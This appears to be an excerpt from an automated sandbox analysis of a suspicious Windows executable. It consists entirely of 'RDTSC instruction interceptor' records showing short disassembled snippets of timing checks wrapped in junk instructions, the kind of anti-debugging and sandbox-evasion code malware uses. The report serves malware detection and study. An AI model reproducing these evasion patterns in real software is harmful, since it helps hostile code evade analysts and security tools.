Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FF8DBB second address: FF8DC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FF8DC1 second address: FF8DD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6D94F5107Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FF8DD4 second address: FF8E00 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F6D94B29704h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F6D94B296F6h 0x00000013 jmp 00007F6D94B296FAh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FF8E00 second address: FF8E27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94F51083h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push edi 0x0000000b jmp 00007F6D94F5107Bh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 104A333 second address: 104A33A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 104A33A second address: 104A34C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6D94F5107Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 104A4CE second address: 104A4E6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6D94B296FFh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 104A4E6 second address: 104A4EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 104A8E9 second address: 104A8EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 104A8EF second address: 104A8F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 104AA26 second address: 104AA30 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 104AA30 second address: 104AA34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 104AD28 second address: 104AD53 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6D94B296F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F6D94B296FAh 0x00000010 push eax 0x00000011 pop eax 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jg 00007F6D94B296FEh 0x0000001e pushad 0x0000001f popad 0x00000020 jo 00007F6D94B296F6h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 104F370 second address: 104F37C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jbe 00007F6D94F51076h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 104F501 second address: 104F516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6D94B296FAh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 104F516 second address: 104F51A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 104F51A second address: 104F526 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jc 00007F6D94B296F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 104FECB second address: 104FEF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007F6D94F51081h 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e je 00007F6D94F51078h 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 push eax 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1050030 second address: 1050034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 105016F second address: 1050179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6D94F51076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1050179 second address: 10501D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94B29704h 0x00000007 jmp 00007F6D94B296FCh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jp 00007F6D94B29711h 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 jnc 00007F6D94B296F6h 0x0000001d popad 0x0000001e jc 00007F6D94B29702h 0x00000024 jo 00007F6D94B296F6h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10501D6 second address: 10501E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F6D94F51076h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10501E4 second address: 10501F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1050315 second address: 105031F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 105031F second address: 1050344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6D94B29708h 0x0000000c jo 00007F6D94B296F6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1050344 second address: 1050348 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 105075E second address: 105077A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6D94B29700h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 105077A second address: 10507AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94F51084h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F6D94F51087h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10507AC second address: 10507B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1052FBD second address: 1052FC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10577B2 second address: 10577B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10577B6 second address: 10577C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F6D94F5107Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 106310E second address: 1063147 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6D94B2970Dh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F6D94B296F8h 0x00000012 jnp 00007F6D94B296FEh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1062577 second address: 1062581 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6D94F51076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1062581 second address: 1062587 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1062587 second address: 106258B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 106258B second address: 1062599 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1062599 second address: 10625B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94F51082h 0x00000007 jmp 00007F6D94F5107Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10625B9 second address: 10625C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10625C0 second address: 10625CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10625CB second address: 10625CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10625CF second address: 10625D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1061C33 second address: 1061C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6D94B296F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10628B7 second address: 10628D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6D94F51087h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1062BAB second address: 1062BAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1065F8A second address: 1065FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6D94F5107Eh 0x00000009 popad 0x0000000a jnp 00007F6D94F51082h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1065FA5 second address: 1065FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F6D94B296F6h 0x0000000a push eax 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10657F2 second address: 10657FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10657FA second address: 106581B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F6D94B296FDh 0x00000008 jng 00007F6D94B296F6h 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F6D94B296F6h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 106596D second address: 106597B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F6D94F5107Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 106597B second address: 106597F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 106597F second address: 1065991 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F6D94F5107Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1065991 second address: 10659AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F6D94B296FDh 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10659AA second address: 10659BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F6D94F51076h 0x0000000a pop ebx 0x0000000b ja 00007F6D94F5107Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1065C7B second address: 1065C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 106802D second address: 1068031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1068031 second address: 1068058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6D94B29707h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F6D94B296FAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1069990 second address: 1069997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 106AFFA second address: 106B03C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F6D94B29705h 0x0000000a pushad 0x0000000b jnl 00007F6D94B296F6h 0x00000011 push eax 0x00000012 pop eax 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F6D94B29708h 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 106F05C second address: 106F061 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 106F1F5 second address: 106F219 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F6D94B296F6h 0x00000009 jmp 00007F6D94B29709h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 106F219 second address: 106F267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F6D94F5107Eh 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F6D94F51083h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007F6D94F5107Bh 0x00000021 pop edi 0x00000022 jmp 00007F6D94F5107Fh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 106F267 second address: 106F278 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6D94B296FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 106F3C7 second address: 106F42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F6D94F51076h 0x0000000a pop esi 0x0000000b jmp 00007F6D94F51083h 0x00000010 jmp 00007F6D94F5107Ch 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007F6D94F51082h 0x0000001e jc 00007F6D94F51076h 0x00000024 jmp 00007F6D94F51086h 0x00000029 jl 00007F6D94F51076h 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1074C59 second address: 1074C5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1074DF4 second address: 1074DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1074F6F second address: 1074F73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1074F73 second address: 1074F7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10750AB second address: 10750AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 101C7CB second address: 101C7D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 101C7D2 second address: 101C802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push esi 0x0000000b mov ch, bh 0x0000000d pop edx 0x0000000e mov ebx, dword ptr [ebp+124817C0h] 0x00000014 sbb dx, 874Ah 0x00000019 add eax, ebx 0x0000001b xor dword ptr [ebp+122D1A2Bh], ecx 0x00000021 mov dword ptr [ebp+122D195Ch], edx 0x00000027 nop 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushad 0x0000002c popad 0x0000002d pushad 0x0000002e popad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 101C802 second address: 101C84C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 je 00007F6D94F51076h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F6D94F51085h 0x00000012 nop 0x00000013 mov dx, 4EC1h 0x00000017 push 00000004h 0x00000019 call 00007F6D94F5107Dh 0x0000001e jc 00007F6D94F5107Ch 0x00000024 xor edi, 7C8E675Eh 0x0000002a pop edx 0x0000002b nop 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f pushad 0x00000030 popad 0x00000031 pop eax 0x00000032 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1078905 second address: 1078919 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6D94B296F6h 0x00000008 jns 00007F6D94B296F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1078919 second address: 1078923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F6D94F51076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1078923 second address: 1078927 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1078A71 second address: 1078A83 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jnl 00007F6D94F51076h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1080FD7 second address: 1080FDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 107F10F second address: 107F119 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6D94F51076h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 107F29F second address: 107F2A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 107F5C0 second address: 107F602 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94F5107Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F6D94F5109Ah 0x0000000f pushad 0x00000010 jne 00007F6D94F51076h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 107F602 second address: 107F62B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6D94B29707h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007F6D94B296F6h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 107F62B second address: 107F634 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 107F634 second address: 107F63A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 107F63A second address: 107F645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F6D94F51076h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 107F645 second address: 107F651 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F6D94B296F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 107F651 second address: 107F655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 107F94E second address: 107F958 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6D94B296F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 108078B second address: 1080792 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10857A4 second address: 10857B0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnc 00007F6D94B296F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1088586 second address: 1088590 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6D94F51082h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
